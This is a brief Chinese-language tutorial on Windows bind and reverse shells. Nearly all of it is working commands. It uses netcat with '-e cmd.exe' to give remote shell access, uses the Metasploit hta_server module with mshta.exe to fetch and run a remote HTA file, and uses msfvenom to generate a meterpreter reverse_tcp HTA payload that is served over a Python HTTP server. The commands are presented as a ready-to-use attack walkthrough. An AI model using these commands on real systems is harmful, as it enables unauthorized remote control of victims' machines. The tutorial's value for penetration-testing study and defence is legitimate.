发布时间:2022-08-19 13:39
目录
反向shell简介
01什么是正向shell
02什么是反向shell
Windows反弹shell
01NC正向shell
01NC反向shell
02mshta.exe
通过Metasoloit的HTA Web Server模块发起HTA攻击
通过msfvenom生成恶意hta文件
正向shell:控制端主动发起亲贵去连接被控制端·中间网络链路不存在阻碍
反向shell(反弹shell):被控端主动发起请求去连接控制端·通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接受发过来的数据包。
被控端:
nc -lvvp 6666 -e cmd.exe
控制端:
nc 192.168.0.105 6666
原理:
被控端将cmd.exe重定向到本地的6666端口·控制端主动连接被控端的6666端口·即可获得shell
控制端:
nc -lvvp 6666
被控端:
nc -e cmd.exe 192.168.0.104 6666
再查看控制端
原理:
被控端将cmd.exe重定向到控制端6666端口·控制端只需要监听本地的6666端口·即可获得shell
mshta.exe是用于负责解释运行HTA文件的Windows OS实用程序·可以运行javascript或VBScript的HTML文件
use exploit/windows/misc/hta_server
set srvhost 192.168.0.104
exploit -j
mshta.exe http://192.168.0.104:8080/SxUxU5AvkuW2LCX.hta
反弹成功
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.104 lport=4444 -f hta-psh -o 222.hta
开启监听
handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.0.104 -P 4444
开启一个http服务,用于被控制端下载执行hta文件
python3 -m http.server
被控端执行
查看http服务
反弹成功